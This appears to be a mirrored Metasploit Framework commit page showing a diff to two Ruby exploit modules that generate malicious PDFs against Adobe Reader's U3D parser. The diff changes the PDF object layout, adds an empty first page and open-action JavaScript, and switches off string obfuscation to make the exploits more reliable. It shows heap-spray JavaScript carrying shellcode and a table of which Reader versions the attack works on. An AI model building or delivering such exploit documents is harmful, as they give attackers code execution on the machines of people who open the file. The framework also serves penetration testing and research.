mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-11-12 11:52:01 +01:00
attempt to improve reliability of u3d pdf exploits
git-svn-id: file:///home/svn/framework3/trunk@7762 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake
parent
ff19b649f3
commit
4bcc8a93a3
@ -145,6 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return xarr;
|
||||
};
|
||||
var memoryz = spray("#{ptrA}","#{ptrB}","#{ptrC}","#{shellcode}");
|
||||
this.pageNum = 1;
|
||||
|
|
||||
|
||||
# Obfuscate it up a bit
|
||||
@ -191,6 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def nObfu(str)
|
||||
return str
|
||||
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
@ -446,7 +448,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) << nObfu("/Pages ") << ioRef(5) << nObfu("/OpenAction ") << ioRef(9) << nObfu(">>")
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4)
|
||||
pdf << nObfu("/Pages ") << ioRef(5)
|
||||
pdf << nObfu("/OpenAction ") << ioRef(8)
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# outline
|
||||
@ -456,8 +461,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# kids
|
||||
xref << pdf.length
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 1/Kids [")
|
||||
pdf << ioRef(8) # u3d page
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [")
|
||||
pdf << ioRef(9) << " " # empty page
|
||||
pdf << ioRef(10) # u3d page
|
||||
pdf << nObfu("]>>")
|
||||
pdf << obj_end
|
||||
|
||||
@ -476,17 +482,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 0 (u3d)
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(8) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << ioDef(8) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# page 0 (empty)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu(" >>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 1 (u3d)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# xrefs
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
|
||||
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.2 - works
|
||||
# reader 8.1.3 - not working
|
||||
# reader 8.1.3 - not working :-/
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
@ -223,6 +223,7 @@ Original notes on heap technique used in this exploit:
|
||||
|
||||
var mem = prepareMemory(200);
|
||||
var holes = prepareHoles(6500);
|
||||
this.pageNum = 1;
|
||||
|
|
||||
js_pg1 = %Q|this.print((bUI:true, bSilent:false, bShrinkToFit:false));|
|
||||
|
||||
@ -399,7 +400,7 @@ Original notes on heap technique used in this exploit:
|
||||
# filename/comment
|
||||
pdf << "%" << RandomNonASCIIString(4) << eol
|
||||
|
||||
# js stream
|
||||
# js stream (doc open action js)
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))
|
||||
pdf << ioDef(1) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
@ -408,9 +409,20 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << "endstream" << eol
|
||||
pdf << obj_end
|
||||
|
||||
# js stream 2 (page 1 annot js)
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))
|
||||
pdf << ioDef(2) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << obj_end
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) << nObfu("/Pages ") << ioRef(5) << nObfu("/OpenAction ") << ioRef(9) << nObfu(">>")
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4)
|
||||
pdf << nObfu("/Pages ") << ioRef(5)
|
||||
pdf << nObfu("/OpenAction ") << ioRef(8) << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# outline
|
||||
@ -418,10 +430,11 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << ioDef(4) << nObfu("<</Type/Outlines/Count 0>>")
|
||||
pdf << obj_end
|
||||
|
||||
# kids
|
||||
# pages/kids
|
||||
xref << pdf.length
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [")
|
||||
pdf << ioRef(8) # u3d page
|
||||
pdf << ioRef(10) << " " # empty page
|
||||
pdf << ioRef(11) # u3d page
|
||||
pdf << nObfu("]>>")
|
||||
pdf << obj_end
|
||||
|
||||
@ -440,29 +453,26 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 0 (u3d/print)
|
||||
# js dict (open action js)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(8) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu("/AA << /O ") << ioRef(10) << nObfu(">>")
|
||||
pdf << nObfu(">>")
|
||||
pdf << ioDef(8) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# js dict (page 1 annot js)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(2) + ">>" << obj_end
|
||||
|
||||
# page 0 (empty)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu(" >>")
|
||||
pdf << obj_end
|
||||
|
||||
# js dict
|
||||
# page 1 (u3d/print)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(11) + ">>" << obj_end
|
||||
|
||||
# js stream 2
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))
|
||||
pdf << ioDef(11) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << ioDef(11) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu("/AA << /O ") << ioRef(9) << nObfu(">>")
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# xrefs
|
||||
|
||||
Loading…
Reference in New Issue
Block a user